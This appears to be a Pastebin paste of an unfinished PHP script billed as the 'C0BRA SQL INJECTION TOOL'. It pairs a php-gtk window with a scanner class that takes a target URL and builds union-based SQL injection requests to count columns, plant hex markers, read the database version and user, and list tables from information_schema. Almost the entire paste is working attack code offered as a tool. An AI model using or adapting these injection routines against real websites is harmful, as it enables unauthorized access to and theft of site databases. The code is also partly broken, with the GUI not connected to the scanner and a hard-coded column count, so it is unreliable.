API tools faq
paste
Guest User

Untitled

a guest
Apr 24th, 2018
92
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.35 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. if (!class_exists('gtk')) {
  3. die("Please load the php-gtk2 module in your php.ini\r\n");
  4. }
  5. function on_interactive_dialog_clicked($aTxtBoxA)
  6. {
  7. static $tempVar;
  8. if ($tempVar == null)
  9. {
  10. $tempVar = "hi";
  11. }
  12. else
  13. {
  14. $tempVar.= "hi";
  15. }
  16. $aTxtBoxA->set_text($tempVar);
  17. }
  18. $wnd = new GtkWindow();
  19. $wnd->set_title('C0BRA SQL INJECTION TOOL');
  20. $wnd->connect_simple('destroy', array('gtk', 'main_quit'));
  21. $lblCredit = new GtkLabel('Please Enter URI To Attack');
  22. $lblUsername = new GtkLabel('_Username', true);
  23. $txtBoxA = new GtkEntry();
  24. $txtBoxB = new GtkEntry();
  25. $txtPassword = new GtkEntry();
  26. $btnAttack = new GtkButton('_Attack');
  27. $btnCancel = new GtkButton('_Quit');
  28. $btnCancel->connect_simple('clicked', array($wnd, 'destroy'));
  29. $btnAttack->connect_simple('clicked', 'on_interactive_dialog_clicked',$txtBoxA);
  30. $tbl = new GtkTable(3, 2);
  31. $tbl->attach($lblCredit, 0, 2, 0, 1);
  32. $tbl->attach($lblUsername, 0, 1, 1, 2);
  33. $tbl->attach($txtBoxA, 1, 2, 1, 2);
  34. $tbl->attach($txtBoxB, 1, 2, 2, 3);
  35. $bbox = new GtkHButtonBox();
  36. $bbox->set_layout(Gtk::BUTTONBOX_EDGE);
  37. $bbox->add($btnCancel);
  38. $bbox->add($btnAttack);
  39. $vbox = new GtkVBox();
  40. $vbox->pack_start($tbl);
  41. $vbox->pack_start($bbox);
  42. $wnd->add($vbox);
  43. $textBuffer = new GtkTextBuffer();
  44. $textView = new GtkTextView();
  45. $wnd->show_all();
  46. //Start the main loop
  47. Gtk::main();
  48. class scanner {
  49. protected $originalSiteToAttack;
  50. protected $siteStrln;
  51. function __construct($aSite = "")
  52. {
  53. $this->originalSiteToAttack = $aSite;
  54. $this->siteStrln = strlen($this->originalSiteToAttack);
  55. }
  56. private function numberOfRows()
  57. {
  58. $originalSiteToAttack = $this->originalSiteToAttack;
  59. $originalSiteToAttack.= "%20order%20by%201--";
  60. $defHtml = file_get_contents($originalSiteToAttack);
  61. for ($i=1;$i<5;$i++)
  62. {
  63. if ($i != 1)
  64. {
  65. $originalSiteToAttack = substr($originalSiteToAttack , 0, $this->siteStrln);
  66. $originalSiteToAttack = $originalSiteToAttack . "%20order%20by%20$i--";
  67. }
  68. $notDefHtml = file_get_contents($originalSiteToAttack);
  69. if (strlen($notDefHtml) != strlen($defHtml))
  70. {
  71. return --$i;
  72. }
  73. }
  74. }
  75. private function buildQuery($aOption,$aTable='')
  76. {
  77. $originalSiteToAttack = $this->originalSiteToAttack;
  78. $numberOfRows = 2;
  79. //$numberOfRows = $this->numberOfRowsVar;
  80. $fieldChar = substr($originalSiteToAttack, -1);
  81. $fieldChar = "-$fieldChar";
  82. $originalSiteToAttack = substr($originalSiteToAttack , 0, $this->siteStrln-1);
  83. $originalSiteToAttack.="$fieldChar";
  84. $originalSiteToAttack .= "%20union%20select%20";
  85. switch ($aOption)
  86. {
  87. case "version":
  88. for ($i=1;$i<=$numberOfRows;$i++)
  89. {
  90. if ($i==$numberOfRows)
  91. {
  92. $originalSiteToAttack.= "@@version%20";
  93. break;
  94. }
  95. //the hex code king
  96. $originalSiteToAttack.= "@@version%20,";
  97. }
  98. $originalSiteToAttack.="--";
  99. return $originalSiteToAttack;
  100. break;
  101. case "vulnurbilityfield":
  102. for ($i=1;$i<=$numberOfRows;$i++)
  103. {
  104. if ($i==$numberOfRows)
  105. {
  106. $originalSiteToAttack.= "CHAR(0x6775797468656b696e67)";
  107. break;
  108. }
  109. //the hex code king
  110. $originalSiteToAttack.= "CHAR(0x6775797468656b696e67),";
  111. }
  112. $originalSiteToAttack.="--";
  113. return $originalSiteToAttack;
  114. break;
  115. case "dbuser":
  116. for ($i=1;$i<=$numberOfRows;$i++)
  117. {
  118. if ($i==$numberOfRows)
  119. {
  120. $originalSiteToAttack.= "user()";
  121. break;
  122. }
  123. //the hex code king
  124. $originalSiteToAttack.= "user(),";
  125. }
  126. $originalSiteToAttack.="--";
  127. return $originalSiteToAttack;
  128. break;
  129. case "numberoftables":
  130. for ($i=1;$i<=$numberOfRows;$i++)
  131. {
  132. if ($i==$numberOfRows)
  133. {
  134. $originalSiteToAttack.= "COUNT(*)";
  135. break;
  136. }
  137. //the hex code king
  138. $originalSiteToAttack.= "COUNT(*),";
  139. }
  140. $originalSiteToAttack.="%20from%20information_schema.tables--";
  141. return $originalSiteToAttack;
  142. break;
  143. case "tables":
  144. for ($i=1;$i<=$numberOfRows;$i++)
  145. {
  146. if ($i==$numberOfRows)
  147. {
  148. $originalSiteToAttack.= "table_name";
  149. break;
  150. }
  151. //the hex code king
  152. $originalSiteToAttack.= "table_name,";
  153. }
  154. $originalSiteToAttack.="%20from%20information_schema.tables%20limit%20$aTable,1--";
  155. return $originalSiteToAttack;
  156. break;
  157. }
  158. }
  159. private function numberOfTables()
  160. {
  161. $originalSiteToAttack = $this->buildQuery("numberoftables");
  162. $defHtml = file_get_contents($originalSiteToAttack);
  163. $relPosition = $this->locateVulnFieldPos();
  164. return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
  165. }
  166. private function versionNumber()
  167. {
  168. $originalSiteToAttack = $this->buildQuery("version");
  169. $defHtml = file_get_contents($originalSiteToAttack);
  170. $relPosition = $this->locateVulnFieldPos();
  171. return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
  172.  
  173. }
  174. private function dbUser()
  175. {
  176. $originalSiteToAttack = $this->buildQuery("dbuser");
  177. $defHtml = file_get_contents($originalSiteToAttack);
  178. $relPosition = $this->locateVulnFieldPos();
  179. return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
  180. }
  181. private function locateVulnFieldPos()
  182. {
  183. $originalSiteToAttack = $this->buildQuery("vulnurbilityfield");
  184. $defHtml = file_get_contents($originalSiteToAttack);
  185. $pos = strpos($defHtml, "king");
  186. return $pos;
  187. }
  188. public function returnTables()
  189. {
  190. $numberOfTables = $this->numberOfTables();
  191. for ($i=0;$i<=$numberOfTables;$i++)
  192. {
  193. $originalSiteToAttack = $this->buildQuery("tables",$i);
  194. echo $originalSiteToAttack."\n";
  195. $defHtml = file_get_contents($originalSiteToAttack);
  196. $relPosition = $this->locateVulnFieldPos();
  197. $arrayToReturn[$i] = substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
  198. }
  199. print_r($arrayToReturn);
  200. }
  201. private function findVulnField()
  202. {
  203. $originalSiteToAttack = $this->originalSiteToAttack;
  204. $originalSiteToAttack .= "%20union%20select%20";
  205. $siteStrln = $this->siteStrln;
  206. $pattern = '/&.*/';
  207. preg_match($pattern, $originalSiteToAttack, $matches);
  208. $explodedGets = explode("&",$matches[0]);
  209. //$numberOfRows = $this->getNumberOfRows();
  210. $numberOfRows = 2;
  211. for ($i=1;$i<count($explodedGets);$i++)
  212. {
  213. $pos = strpos($explodedGets[$i], "=");
  214. $pos++;
  215. $strCutedA = substr($explodedGets[$i], 0, $pos);
  216. $strCutedB = substr($explodedGets[$i], $pos, strlen($explodedGets[$i]));
  217. $strCutedB = preg_replace('/%.*/', "", $strCutedB);
  218. $explodedGetsB[$i] = $strCutedA."-".$strCutedB;
  219. }
  220.  
  221. for ($i=1;$i<=count($explodedGetsB);$i++)
  222. {
  223. echo "$$$$$$$".$i."\n";
  224. $originalSiteToAttack = str_replace($explodedGets[$i],$explodedGetsB[$i],$originalSiteToAttack);
  225. for ($j=1;$j<=$numberOfRows;$j++)
  226. {
  227. if ($j==$numberOfRows)
  228. {
  229. $originalSiteToAttack.= "CHAR(0x6775797468656b696e67)";
  230. //break;
  231. }
  232. //the hex code king
  233. $originalSiteToAttack.= "CHAR(0x6775797468656b696e67),";
  234. }
  235. $originalSiteToAttack.="--";
  236. echo $originalSiteToAttack."\n";
  237. //$defHtml = file_get_contents($originalSiteToAttack);
  238. //$pos = strrpos($defHtml,"king");
  239. //echo $pos;
  240. }
  241. }
  242. public function getVulbField()
  243. {
  244. $this->vulnField = $this->findVulnField();
  245. return $this->vulnField;
  246. }
  247.  
  248. public function getVersionNumber()
  249. {
  250. $this->dbVersion = $this->versionNumber();
  251. return $this->dbVersion ;
  252. }
  253.  
  254. private function getNumberOfRows()
  255. {
  256. $this->numberOfRowsVar = $this->numberOfRows();
  257. return $this->numberOfRowsVar."\n";
  258. }
  259. public function getUser()
  260. {
  261. $this->dbUserField = $this->dbUser();
  262. return $this->dbUserField;
  263. }
  264. private function getNumberOfTables()
  265. {
  266. $this->numberTables = $this->numberOfTables();
  267. return $this->numberTables;
  268. }
  269. private function getTables()
  270. {
  271. $numberOfTables = $this->getNumberOfTables();
  272. }
  273. public function __toString()
  274. {
  275. return $this->originalSiteToAttack;
  276. }
  277.  
  278. }
  279.  
  280. $arguments = getopt("t:d:");
  281. $target = $arguments["t"];
  282. $db = $arguments["d"];
  283. $scannerObject = new scanner($target);
  284. //echo $scannerObject->getVersionNumber();
  285. //echo $scannerObject->getUser();
  286. //echo $scannerObject->returnTables();
  287. echo $scannerObject->getVulbField();
  288. //for ($i=0; $i<strlen($string); $i++) {
  289. // echo $string[$i];
  290. //}
  291.  
  292.  
  293. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!